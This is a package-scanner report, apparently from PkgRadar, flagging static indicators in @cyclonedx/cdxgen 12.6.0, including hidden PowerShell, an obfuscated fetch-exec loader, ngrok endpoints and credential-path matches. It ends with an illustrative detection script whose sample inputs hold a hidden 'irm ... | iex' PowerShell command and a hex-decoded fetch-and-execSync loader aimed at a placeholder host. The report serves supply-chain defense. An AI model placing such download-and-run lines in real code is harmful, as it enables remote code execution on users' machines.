PkgRadar

Package evidence

@cyclonedx/[email protected]

Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.

Trust signals

Why this verdict

PkgRadar discounts a release's score when public reputation argues against novel malware. The verdict above already reflects these discounts; this panel only explains which were applied.

Weekly downloads: 164,418 (Ubiquitous · −70% score)
Versions published: 229 (Mature · −50% score)
First published: Feb 2023
Publisher: GitHub Actions (Trusted automation · −70% score)

Effective trust discount applied: 70% (the maximum across signals; discounts do not stack). A new or changed install-lifecycle script relative to the previous release would clear the discount.

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below. Two facts elsewhere on this page bound that triage: none of the 15 findings is attributable to the diff against 12.5.1, so the indicators are not new in this release, and every high- and medium-severity hit sits in a `*.poku.js` file, the naming used by the manifest's `test: poku` runner, while the manifest's eight scripts include no preinstall, install or postinstall hook. The first check is therefore to fetch the tarball, confirm it matches the SHA-256 listed under the artifact metadata, and read those files to establish whether they are test fixtures and whether any runtime entry point (package/lib/cli/index.js or the non-.poku modules) can reach them.

Block this release in CI (curl or GitHub Actions)

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard. curl's -f flag makes the command exit non-zero on an HTTP 4xx/5xx response, which is what fails the step; -sS suppresses the progress meter while still printing errors, so a gate that answers 200 with a "block" body would not fail the build unless you also inspect the response.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@cyclonedx/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@cyclonedx/[email protected]"],"fail_on":"high"}'

Artifact bytes: 1,999,484
Previous version: 12.5.1
Published: 2026-06-14T05:40:46.932Z
SHA-256: de10d9d2a6a23d5d6cdda8fdd0d9e26eef960a79fdb070e4c6357f5edca20c2d

Why flagged

What the scanner saw


1 candidate cluster currently references this release.

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

Status: available
Risk: high
Score: 60
Version: 12.6.0
Last checked: (timestamp not captured)

Status history (4 events, newest first)
  1. available · risk high · score 60 (score 46 -> 60; status and risk unchanged)
  2. available · risk high · score 46 (score 42 -> 46; status and risk unchanged)
  3. available · risk high · score 42 (score 41 -> 42; status and risk unchanged)
  4. new -> available · risk high · score 41 (status changed)

Related candidates

Linked campaigns and clusters

Repeated static TTP (active campaign)
  Js Obfuscated Fetch Exec: hex-decoded literal + network fetch + child-process exec, a staged obfuscated-loader / dropper (hides the C2 URL from literal-URL detection).
  45 members · evidence strength 90

Repeated static TTP (candidate)
  Same TTP as the active cluster above.
  45 members · max score 259

Evidence

Static findings

15 static findings · 0 attributable to the diff against 12.5.1 · high-signal first.

Each entry: severity · kind · points, followed by the path and the matched detail.

  • high · Js Hidden Powershell · 45
    Path: package/lib/stages/postgen/auditBom.poku.js
    Detail: Hidden / non-interactive PowerShell invocation in package code (`-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent) used to download-and-run payloads on Windows installers.
  • high · Js Obfuscated Fetch Exec · 45
    Path: package/lib/helpers/utils.poku.js
    Detail: Hex-decoded literal + network fetch + child-process exec, a staged obfuscated-loader / dropper (hides the C2 URL from literal-URL detection).
  • high · Webhook Exfil Endpoint · 40
    Path: package/lib/stages/postgen/auditBom.poku.js
    Detail: matched "ngrok-free.app"
  • high · Webhook Exfil Endpoint · 40
    Path: package/lib/stages/postgen/postgen.poku.js
    Detail: matched "ngrok-free.app"
  • medium · Tls Verification Disabled · 12
    Path: package/lib/stages/pregen/envAudit.poku.js
    Detail: matched "NODE_TLS_REJECT_UNAUTHORIZED: \"0"
  • low · Credential file access · 5
    Path: package/lib/stages/postgen/auditBom.poku.js
    Detail: matched ".ssh/"
  • low · Credential file access · 5
    Path: package/lib/managers/docker.poku.js
    Detail: matched ".aws/"
  • low · Messenger Bot Endpoint · 5
    Path: package/lib/helpers/formulationParsers.poku.js
    Detail: matched "ngrok-free.app" (notification/dev-tunnel URL without exfil context)
  • low · Credential file access · 5
    Path: package/lib/cli/index.js
    Detail: matched ".npmrc"
  • low · Credential file access · 5
    Path: package/lib/cli/index.poku.js
    Detail: matched ".ssh/"
  • low · Credential file access · 5
    Path: package/lib/helpers/npmutils.js
    Detail: matched ".npmrc"
  • low · Credential file access · 5
    Path: package/lib/helpers/osqueryTransform.poku.js
    Detail: matched ".ssh/"
  • low · Credential file access · 5
    Path: package/lib/helpers/utils.js
    Detail: matched ".npmrc"
  • low · Credential file access · 5
    Path: package/lib/helpers/utils.poku.js
    Detail: matched ".npmrc"
  • low · Credential file access · 3
    Path: package/data/crypto-oid.json
    Detail: matched "ID_RSA"
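
As an added illustration (this is neither PkgRadar's scanner nor cdxgen code), the two high-severity indicator kinds in the table expressed as static rules and run over constructed JavaScript snippets, with a triage step that tags whether a hit lives in a `*.poku.js` file (the naming convention of the manifest's `test: poku` runner) or in a runtime module. The regular expressions, the sample file contents and the `scope` labels are this example's assumptions; the conjunction rule for Js Obfuscated Fetch Exec follows the table's own description (hex-decoded literal + network fetch + child-process exec in one file), and the Js Hidden Powershell rule fires on any one of the signatures the finding names.

```javascript
// Added example (not PkgRadar's scanner, not cdxgen code): static rules for the
// two high-severity indicator kinds in the findings table, plus a triage tag.
// The regexes, sample snippets and scope labels are assumptions of this example.

// Js Hidden Powershell: any single signature from the finding's description is a hit.
const HIDDEN_POWERSHELL = {
  kind: "Js Hidden Powershell",
  severity: "high",
  any: [
    /-WindowStyle\s+Hidden/i,   // powershell.exe -WindowStyle Hidden
    /\birm\b[^\n]*\|\s*iex\b/i, // irm <url> | iex (download-and-run)
    /windowsHide\s*:\s*true/,   // child_process option that hides the console window
  ],
};

// Js Obfuscated Fetch Exec: a conjunction, all three must appear in the same file.
const OBFUSCATED_FETCH_EXEC = {
  kind: "Js Obfuscated Fetch Exec",
  severity: "high",
  all: [
    /Buffer\.from\(\s*["'][0-9a-f]{8,}["']\s*,\s*["']hex["']\s*\)/i, // hex-decoded literal
    /\b(fetch|got|axios|https?\.get|https?\.request)\s*\(/,           // network fetch
    /\b(exec|execSync|spawn|spawnSync)\s*\(/,                          // child-process exec
  ],
};

// Scan one file's source text and return zero or more findings.
function scanFile(path, source) {
  const findings = [];
  const sig = HIDDEN_POWERSHELL.any.find((re) => re.test(source));
  if (sig) {
    findings.push({ kind: HIDDEN_POWERSHELL.kind, severity: HIDDEN_POWERSHELL.severity, path, matched: source.match(sig)[0] });
  }
  if (OBFUSCATED_FETCH_EXEC.all.every((re) => re.test(source))) {
    findings.push({ kind: OBFUSCATED_FETCH_EXEC.kind, severity: OBFUSCATED_FETCH_EXEC.severity, path, matched: "hex literal + fetch + exec" });
  }
  return findings;
}

// Triage tag: does the hit sit in a test-runner file (*.poku.js) or a runtime module?
function triage(findings) {
  return findings.map((f) => ({ ...f, scope: /\.poku\.js$/.test(f.path) ? "test-runner file" : "runtime" }));
}

// Constructed sample sources (not the package's real files).
const SAMPLES = {
  "package/lib/stages/postgen/auditBom.poku.js":
    'const cmd = \'powershell -WindowStyle Hidden -Command "irm https://example.invalid/a.ps1 | iex"\';',
  "package/lib/helpers/utils.poku.js": [
    'const url = Buffer.from("68747470733a2f2f6578616d706c652e696e76616c6964", "hex").toString();',
    "const res = await fetch(url);",
    "execSync(await res.text());",
  ].join("\n"),
  "package/lib/helpers/utils.js": [
    'import { execFileSync } from "node:child_process";',
    'export const npmVersion = () => execFileSync("npm", ["--version"]).toString().trim();',
  ].join("\n"),
};

// Scan every sample and attach the triage tag.
function scanAll(samples = SAMPLES) {
  return triage(Object.entries(samples).flatMap(([path, src]) => scanFile(path, src)));
}

for (const f of scanAll()) {
  console.log(`${f.severity}\t${f.kind}\t${f.path}\t[${f.scope}]\t${f.matched}`);
}
```

The scope tag does not lower a finding's severity by itself; it tells the reviewer which question to ask next. A hidden-PowerShell string in a test fixture calls for checking whether that fixture is ever executed at install time or by a runtime code path, whereas the same string in package/lib/cli/index.js would be reachable by every user of the CLI.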

Manifest

Package metadata

Scripts (8)
  • gen-types: pnpm exec tsc
  • install:frozen: pnpm install --config.strict-dep-builds=true --frozen-lockfile --package-import-method copy
  • install:prod: pnpm install --config.strict-dep-builds=true --frozen-lockfile --package-import-method copy --prod
  • lint: biome check --write
  • lint:check: biome check
  • lint:errors: biome check --diagnostic-level=error
  • test: poku
  • watch: poku --watch
Dependencies (35)
  • @babel/parser 7.29.7
  • @babel/traverse 7.29.7
  • @iarna/toml 2.2.5
  • @isaacs/string-locale-compare 1.1.0
  • @npmcli/fs 5.0.0
  • @npmcli/map-workspaces 5.0.3
  • @npmcli/name-from-folder 4.0.0
  • @npmcli/package-json 7.0.5
  • ajv 8.20.0
  • ajv-formats 3.0.1
  • bin-links 6.0.2
  • cheerio 1.2.0
  • common-ancestor-path 1.0.1
  • edn-data 1.1.2
  • glob 13.0.6
  • got 14.6.6
  • iconv-lite 0.7.2
  • json-stringify-nice 1.1.4
  • keyv 5.6.0
  • node-stream-zip 1.15.0
  • npm-package-arg 13.0.2
  • packageurl-js 1.0.2
  • parse-conflict-json 5.0.1
  • properties-reader 3.0.1
  • read-package-json-fast 5.0.0
  • semver 7.8.2
  • ssri 13.0.1
  • tar 7.5.16
  • treeverse 3.0.0
  • uuid 14.0.0
  • …and 5 more.
Optional dependencies (21)
  • @appthreat/atom 2.5.5
  • @appthreat/atom-parsetools 1.2.2
  • @bufbuild/protobuf 2.12.0
  • @cdxgen/cdx-hbom 0.5.0
  • @cdxgen/cdx-proto 2.0.3
  • @cdxgen/cdxgen-plugins-bin 2.5.1
  • @cdxgen/cdxgen-plugins-bin-darwin-amd64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-darwin-arm64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-amd64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-arm 2.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-arm64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-ppc64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-linuxmusl-amd64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-linuxmusl-arm64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-windows-amd64 2.5.1
  • @cdxgen/cdxgen-plugins-bin-windows-arm64 2.5.1
  • @cdxgen/safer-exec 0.11.0
  • body-parser 2.2.2
  • compression 1.8.1
  • connect 3.7.0
  • jsonata 2.2.1